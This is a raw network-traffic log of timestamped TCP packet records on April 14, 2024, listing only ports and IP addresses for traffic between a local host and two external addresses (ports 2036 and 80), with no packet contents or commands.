Apr 14, 2024 08:45:38.451741934 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451771021 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451809883 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451817036 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451848030 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451884031 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451921940 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451929092 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451960087 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451972961 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451999903 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452043056 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452047110 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452083111 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452121019 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452133894 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452164888 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452212095 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452238083 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452282906 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452330112 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452331066 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452372074 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452409029 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452424049 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452446938 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452482939 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452505112 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452519894 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452555895 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452585936 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452593088 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452630043 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452652931 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452686071 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452723026 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452745914 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452759981 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452796936 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452821016 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452833891 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452871084 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452882051 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.452908039 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452944994 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.452979088 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453001022 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453037024 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453037977 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453077078 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453085899 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453098059 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453115940 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453155994 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453166962 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453195095 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453232050 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453269005 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453282118 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453305960 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453313112 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453345060 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453387976 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453401089 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453427076 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453464031 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453480959 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453500032 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453536987 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453561068 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453572989 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453612089 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453619957 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453648090 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453684092 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453722000 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453728914 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453758955 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453766108 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453798056 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453835964 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453871965 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453879118 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453908920 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453916073 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.453947067 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.453984022 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454022884 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454027891 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454062939 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454076052 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454101086 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454142094 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454150915 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454180002 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454216957 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454255104 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454260111 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454292059 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454298019 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454332113 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454368114 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454370975 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454406977 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454443932 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454480886 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454488039 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454520941 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454526901 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454559088 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454596996 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454632998 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454639912 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454669952 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454677105 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454706907 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454744101 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454780102 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454786062 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454817057 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454824924 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454854965 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454891920 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454929113 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454935074 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.454967022 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.454972029 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455004930 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455043077 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455079079 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455087900 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455116987 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455121994 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455212116 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455248117 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455284119 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455293894 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455321074 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455339909 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455358028 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455394983 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455430984 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455435038 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455467939 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455473900 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455507994 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455543995 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455579996 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455586910 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455615044 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455627918 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455652952 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455691099 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455727100 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455739021 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455760002 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455787897 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455796957 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455841064 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455884933 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455889940 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455929041 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.455940962 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.455965996 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456002951 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456037998 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456069946 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456105947 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456144094 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456145048 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456173897 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456182003 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456244946 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456283092 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456290960 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456320047 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456324100 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456357956 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456389904 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456425905 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456432104 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456465006 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456496000 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456502914 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456536055 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456573009 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456574917 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456609964 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456618071 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456648111 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456681967 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456697941 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456720114 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456758022 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456768990 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456795931 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456828117 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456845045 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456864119 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456899881 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456912994 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.456938028 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456969976 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.456986904 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.457006931 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.457055092 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.538894892 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.538960934 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.682980061 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683048010 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683089018 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683126926 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683146000 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.683171988 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683195114 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.683291912 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683331013 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683372021 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683384895 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.683422089 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.683439970 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683479071 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683516026 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683552980 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683571100 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.683592081 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683598995 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.683629990 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683669090 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683705091 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683715105 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.683743954 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683753967 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.683782101 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683820009 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683856964 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683872938 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.683895111 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683903933 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.683934927 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.683973074 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684009075 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684021950 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684047937 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684053898 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684087992 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684124947 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684165955 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684179068 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684205055 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684212923 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684272051 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684310913 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684348106 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684364080 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684386015 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684396982 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684423923 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684462070 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684498072 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684514999 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684535980 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684544086 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684575081 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684613943 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684650898 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684662104 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684689999 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684700012 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684729099 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684766054 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684803009 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684818983 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684842110 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684851885 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684880972 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684920073 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684956074 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.684973955 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.684993029 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.685003042 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.685031891 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.685069084 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.685105085 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.685115099 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.685147047 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.685158968 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.685189009 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.686153889 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.867985964 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:39.094145060 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:39.095956087 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:39.322143078 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:39.402838945 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:39.402956963 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:39.402992010 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:39.403029919 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:39.403099060 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:39.403234959 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:39.403234959 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:39.460232973 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:39.630625963 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:39.686114073 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:41.641799927 CEST	49740	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:41.715495110 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:41.972997904 CEST	80	49740	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:41.973150015 CEST	49740	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:41.973536015 CEST	49740	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.048892975 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.048984051 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049159050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049246073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049292088 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049325943 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049344063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049393892 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049393892 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049417019 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049439907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049465895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049489975 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049520016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049559116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049578905 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049614906 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.049639940 CEST	49741	80	192.168.2.4	91.202.233.180
